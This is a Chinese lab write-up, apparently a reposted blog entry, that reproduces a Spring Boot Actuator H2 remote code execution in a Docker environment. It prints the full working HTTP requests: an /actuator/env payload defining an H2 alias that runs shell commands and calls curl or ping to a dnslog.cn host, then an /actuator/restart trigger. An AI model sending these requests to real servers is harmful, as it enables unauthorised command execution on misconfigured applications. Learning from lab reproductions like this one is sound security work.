zoukankan      html  css  js  c++  java
  • Spring Boot Actuator H2 RCE复现

    0x01 前言

    Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。

    0x02 环境搭建

    windows10 IP:192.168.233.1
    centos7 IP:192.168.233.140

    CentOS docker环境下载地址

    git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
    

    使用Docker搭建环境
    从Dockerfile中创建镜像

    docker build -t spaceraccoon/spring-boot-rce-lab .
    


    启动docker中springboot镜像

    docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab
    


    本地访问虚拟机8080端口/actuator路径,docker环境搭建成功

    http://192.168.233.140:8080/actuator
    

    0x03 漏洞复现

    1.提交POST请求,请求头内容为必须携带内容

    POST /actuator/env HTTP/1.1
    Host: 192.168.222.143:8080
    Content-Type: application/json
    Content-Length: 393
    
    {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 11od6s.dnslog.cn');"}
    

    2.向端点 /actuator/restart 发送POST请求,重启应用

    POST /actuator/restart HTTP/1.1
    Host: 192.168.222.143:8080
    Content-Type: application/json
    Content-Length: 2
    
    {}
    


    3.dnslog.cn收到请求

    0x04 结束语

    细心的小伙伴肯定也看到了,我最后截图中的dnslog和测试时候的dnslog地址不一样,是因为在使用curl命令的时候测试失败了,可能是因为Linux中的原因,于是我把命令换成了ping -c xxx.dnslog.cn
    ,大家复现失败记得换一下命令哦

    ping xxx.dnslog.cn
    
  • 相关阅读:
    简爱 灵魂所在
    charles抓取http/https
    Class.forName()用法
    ArrayList源码剖析
    java中的多线程
    分布式负载均衡缓冲系统,如何快速定位到是那个服务器
    maven依赖jar包时版本冲突的解决
    简单工厂模式设计(java反射机制改进)
    Fiddler 抓包工具使用详解
    Fiddler 使用
  • 原文地址:https://www.cnblogs.com/KHZ521/p/14094979.html
Copyright © 2011-2022 走看看